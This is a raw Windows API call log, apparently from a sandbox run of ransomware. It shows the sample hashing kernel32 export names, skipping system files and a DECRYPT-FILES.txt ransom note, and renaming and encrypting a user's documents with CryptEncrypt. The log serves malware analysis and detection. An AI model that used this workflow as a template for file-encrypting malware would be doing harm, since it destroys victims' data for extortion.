returned 18 [0084.716] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0084.716] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0084.716] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0084.716] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0084.716] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0084.716] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0084.716] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0084.716] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0084.716] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0084.716] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0084.716] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0084.716] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0084.716] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0084.717] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0084.717] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0084.717] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0084.717] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0084.717] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0084.717] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0084.717] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0084.717] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0084.717] lstrlenA (lpString="CTRLROUTINE") returned 11 [0084.717] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0084.717] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0084.717] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0084.717] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0084.717] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0084.717] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0084.717] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0084.717] lstrlenA (lpString="DEBUGBREAK") returned 10 [0084.717] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0084.717] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0084.717] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0084.717] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0084.717] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0084.717] lstrlenA (lpString="DECODEPOINTER") returned 13 [0084.717] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0084.717] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0084.717] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0084.717] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0084.717] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0084.717] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0084.717] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0084.717] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0084.717] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0084.717] lstrlenA (lpString="DELETEATOM") returned 10 [0084.717] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0084.717] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0084.717] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0084.717] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0084.718] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0084.718] lstrlenA (lpString="DELETEFIBER") returned 11 [0084.718] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0084.718] lstrlenA (lpString="DELETEFILEA") returned 11 [0084.718] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0084.718] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0084.718] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0084.718] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0084.718] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0084.718] lstrlenA (lpString="DELETEFILEW") returned 11 [0084.718] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0084.718] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0084.718] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0084.718] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0084.718] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0084.718] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0084.718] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0084.718] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0084.718] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0084.718] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0084.718] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0084.718] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0084.718] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0084.718] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0084.718] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0084.718] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0084.718] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0084.718] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0084.718] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0084.718] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0084.718] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0084.718] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0084.718] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0084.718] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0084.718] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0084.718] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0084.719] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0084.719] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0084.719] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0084.719] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0084.719] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0084.719] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0084.719] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0084.719] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0084.719] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0084.719] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0084.719] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0084.719] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0084.719] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0084.719] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0084.719] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0084.719] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0084.719] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0084.719] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0084.719] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0084.719] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0084.719] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0084.719] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0084.719] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0084.719] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0084.719] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0084.719] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0084.719] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0084.719] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0084.719] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0084.719] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0084.719] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0084.719] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0084.719] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0084.719] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0084.719] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0084.719] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0084.720] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0084.720] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0084.720] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0084.720] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0084.720] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0084.720] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0084.720] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\narDJcaEcu74Unr7M\\puUPAH5A1myMbGOan2W.doc") returned 98 [0084.720] wsprintfW (in: param_1=0x3f2dc28, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\narDJcaEcu74Unr7M\\puUPAH5A1myMbGOan2W.doc.389K6u") returned 105 [0084.720] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\narDJcaEcu74Unr7M\\puUPAH5A1myMbGOan2W.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\s3f3ughxqbgggruc\\nardjcaecu74unr7m\\puupah5a1mymbgoan2w.doc"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\narDJcaEcu74Unr7M\\puUPAH5A1myMbGOan2W.doc.389K6u" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\s3f3ughxqbgggruc\\nardjcaecu74unr7m\\puupah5a1mymbgoan2w.doc.389k6u"), dwFlags=0x0) returned 1 [0084.721] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.721] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.721] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.721] FindNextFileW (in: hFindFile=0x5f8b18, lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2c64e2c0, ftCreationTime.dwHighDateTime=0x1d4cb48, ftLastAccessTime.dwLowDateTime=0x10aef4d0, ftLastAccessTime.dwHighDateTime=0x1d4cdf5, ftLastWriteTime.dwLowDateTime=0x10aef4d0, ftLastWriteTime.dwHighDateTime=0x1d4cdf5, nFileSizeHigh=0x0, nFileSizeLow=0x119da, dwReserved0=0x0, dwReserved1=0x0, cFileName="USQTCeso0O.ods", cAlternateFileName="USQTCE~1.ODS")) returned 1 [0084.721] lstrcmpiW (lpString1="USQTCeso0O.ods", lpString2="DECRYPT-FILES.txt") returned 1 [0084.721] lstrcmpiW (lpString1="USQTCeso0O.ods", lpString2="autorun.inf") returned 1 [0084.722] lstrcmpiW (lpString1="USQTCeso0O.ods", lpString2="boot.ini") returned 1 [0084.722] lstrcmpiW (lpString1="USQTCeso0O.ods", lpString2="desktop.ini") returned 1 [0084.722] lstrcmpiW (lpString1="USQTCeso0O.ods", lpString2="ntuser.dat") returned 1 [0084.722] lstrcmpiW (lpString1="USQTCeso0O.ods", lpString2="iconcache.db") returned 1 [0084.722] lstrcmpiW (lpString1="USQTCeso0O.ods", lpString2="bootsect.bak") returned 1 [0084.722] lstrcmpiW (lpString1="USQTCeso0O.ods", lpString2="ntuser.dat.log") returned 1 [0084.722] lstrcmpiW (lpString1="USQTCeso0O.ods", lpString2="thumbs.db") returned 1 [0084.722] lstrcmpiW (lpString1="USQTCeso0O.ods", lpString2="Bootfont.bin") returned 1 [0084.722] lstrlenW (lpString="USQTCeso0O.ods") returned 14 [0084.722] lstrcmpiW (lpString1="ods", lpString2="lnk") returned 1 [0084.722] lstrcmpiW (lpString1="ods", lpString2="exe") returned 1 [0084.722] lstrcmpiW (lpString1="ods", lpString2="sys") returned -1 [0084.722] lstrcmpiW (lpString1="ods", lpString2="dll") returned 1 [0084.722] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\narDJcaEcu74Unr7M\\") returned 75 [0084.722] lstrlenW (lpString="USQTCeso0O.ods") returned 14 [0084.722] lstrcpyW (in: lpString1=0x3f2e428, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\narDJcaEcu74Unr7M\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\narDJcaEcu74Unr7M\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\narDJcaEcu74Unr7M\\" [0084.722] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\narDJcaEcu74Unr7M\\", lpString2="USQTCeso0O.ods" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\narDJcaEcu74Unr7M\\USQTCeso0O.ods") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\narDJcaEcu74Unr7M\\USQTCeso0O.ods" [0084.722] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0084.722] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\narDJcaEcu74Unr7M\\USQTCeso0O.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\s3f3ughxqbgggruc\\nardjcaecu74unr7m\\usqtceso0o.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x438 [0084.722] GetFileSizeEx (in: hFile=0x438, lpFileSize=0x3f2dbf0 | out: lpFileSize=0x3f2dbf0*=72154) returned 1 [0084.722] CreateFileMappingW (hFile=0x438, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x43c [0084.723] MapViewOfFile (hFileMappingObject=0x43c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0084.723] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0084.723] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0084.723] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0084.723] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfc0000*, pdwDataLen=0x3f2db58*=0x28, dwBufLen=0x100 | out: pbData=0xfc0000*, pdwDataLen=0x3f2db58*=0x100) returned 1 [0084.723] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0084.724] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.725] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0084.726] CloseHandle (hObject=0x43c) returned 1 [0084.726] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.726] WriteFile (in: hFile=0x438, lpBuffer=0xfc0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2db78, lpOverlapped=0x0 | out: lpBuffer=0xfc0000*, lpNumberOfBytesWritten=0x3f2db78*=0x108, lpOverlapped=0x0) returned 1 [0084.727] CloseHandle (hObject=0x0) returned 0 [0084.727] CloseHandle (hObject=0x438) returned 1 [0084.727] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.727] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.727] GetTickCount () returned 0x114da49 [0084.727] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0084.727] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0084.727] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0084.728] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0084.728] lstrlenA (lpString="kernel32.dll") returned 12 [0084.728] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0084.728] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0084.728] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0084.728] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0084.728] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0084.728] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0084.728] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0084.728] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0084.728] lstrlenA (lpString="ADDATOMA") returned 8 [0084.728] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0084.728] lstrlenA (lpString="ADDATOMW") returned 8 [0084.728] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0084.728] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0084.728] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0084.728] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0084.728] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0084.729] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0084.729] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0084.729] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0084.729] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0084.729] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0084.729] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0084.729] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0084.729] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0084.729] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0084.729] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0084.729] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0084.729] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0084.729] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0084.729] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0084.729] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0084.729] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0084.729] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0084.729] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0084.729] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0084.729] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0084.729] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0084.729] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0084.729] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0084.729] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0084.729] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0084.729] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0084.729] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0084.729] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0084.729] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0084.729] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0084.729] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0084.729] 